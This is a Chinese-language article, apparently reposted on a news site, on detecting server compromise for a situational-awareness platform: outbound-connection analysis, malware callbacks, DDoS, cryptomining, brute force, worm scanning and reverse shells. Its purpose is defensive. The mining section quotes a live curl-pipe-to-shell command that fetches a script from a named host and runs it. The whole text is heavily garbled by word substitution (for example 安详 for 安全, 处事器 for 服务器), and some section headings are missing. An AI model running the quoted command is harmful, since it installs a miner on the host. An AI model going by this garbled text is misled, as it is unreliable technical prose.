态势感知——服务器安全策略探索
副问题[/!--empirenews.page--]
0x00、营业需求 企业IT架构数字化转型的大潮中,每每谋面对各类百般的安详威胁,包罗:体系和应用软件裂痕操作进攻,APT进攻,数据泄漏,云处事器滥用,DDoS进攻等。同时为了应对速率越来越快的收集犯法进攻,以及针对性进攻的多态化。为我们安详职员提出了更高的要求。 在做应急相应安详变乱进程的进程中,确认进攻陈迹一样平常从以下几个方面: 0x01、处事器安详告警 在态势感知产物中,,在处事器上陈设EDR终端是一个很好的处事器安详量化的一个进程。由于我们在处事器上可以网络历程、端口、账号、软件以及文件目次基本的安详数据。通过这些基本数据通事靠山大数据说明加工形成我们感知到威胁。 本篇首要从处事器端做检测,处事器端检测有以下上风:
那么我们先从入侵举动说明开始:
检测思绪:必要网络处事器端基本数据: 及时收集毗连数据,同时必要贸易威胁谍报数据源。 及时收集毗连数据,尝试情形搭建:通过kolide+osquery+ElasticSearch+kibana。 实现步调: 1、从处事器端获取基本外联收集数据。 2、通过flink可能spark streaming做及时Top历程、Top外联IP统计,说明全部处事器上传的外联孤岛数据,也可以编辑法则重点监控下载应用措施,可能下载对端的应用假如是HFS处事。必要重点存眷。虽然这里可以玩的playbook许多,必要用户本身发掘。 3、从中获取到应有措施路径、对外毗连IP信息,以及端口。通过IP地点查询威胁谍报,假如对端IP地点行使的C2、Tor、VPN、SS等地点视为失陷主机。态势感知——处事器安详计策试探
检测思绪:这里首要是增进内容特性,好比说:上传装备根基信息、发送进攻指令、获取公网IP地点、黑客进攻毗连等。处事器端必要把恶意措施上传云查杀可能云沙箱做深入检测。 尝试情形:Malice(支持Yara+多杀毒引擎集成+virustotal)+ClamAV +ElasticSearch+kibana。 IDS检测法则完美: 虽然必要一个安详Team维护这个法则。 检测流程: 1、通过IDS检测到对外毗连。 2、通过收集通信历程关联到文件。 3、上传文件到云查杀体系中检测。假如发明病毒告警。
检测思绪:通过获取及时历程快照,收集对外毗连快照,收集层获取其流量信息,同时也上传对应的历程文件到云查杀和云沙箱检测。在收集层检测通过IDS法则检测到对外DDoS进攻最多为:NTP反射进攻、memcache反射进攻。可是在处事器端检测会发明更多进攻方法,譬喻:CC进攻、SIP协议进攻、视频协议进攻、SYN Flood、ACK Flood等。虽然必要客户端抓包进一步确认。 检测流程: 1、获取历程快照,收集对外毗连快照,对外毗连收集流量(必要驱动支持)可能获取总流量。 2、执行抓包措施,收罗处事器端Pcap包,上传Pcap包样本随处事器端。 3、通过各类DDoS进攻法则过滤,假如发明预定的进攻范例。
检测思绪:特性是CPU占用率过高。通过上传历程快照,同时获取相同top呼吁CPU占用率信息。可以确定挖矿历程。虽然尚有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖矿。 检测流程: 1、获取历程快照,CPU占用率信息。 2、多次CPU占率过高的历程聚合。 3、上传文件到云查杀体系中检测。假如发明病毒告警。 4、复查各个端口被入侵的陈迹,假如发生以下进攻告警,必要大数据关联说明(flink or spark streaming)。
检测思绪:关联收集层检测和处事器端检测相干历程。 检测流程: 1、获取历程快照,对外收集毗连快照。 2、获取收集层面各类协议的暴力破解告警。 3、行使flink or spark streaming 做大数据关联说明。
检测思绪:假如存在对外扫描成果,通过大数据说明收集毗连,短时刻内过多毗连视为可疑。 检测流程: 1、获取历程快照,对外收集毗连快照。 2、获取收集层面临外可疑毗连告警。 3、上传文件到云查杀体系中检测。进一步说明,发明病毒标志为蠕虫病毒告警。
检测思绪:sh可能bash运行打开长途毗连,视为反弹shell。 检测流程: 1、获取历程快照,对外收集毗连快照。 2、查询语句。
(编辑:河北网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |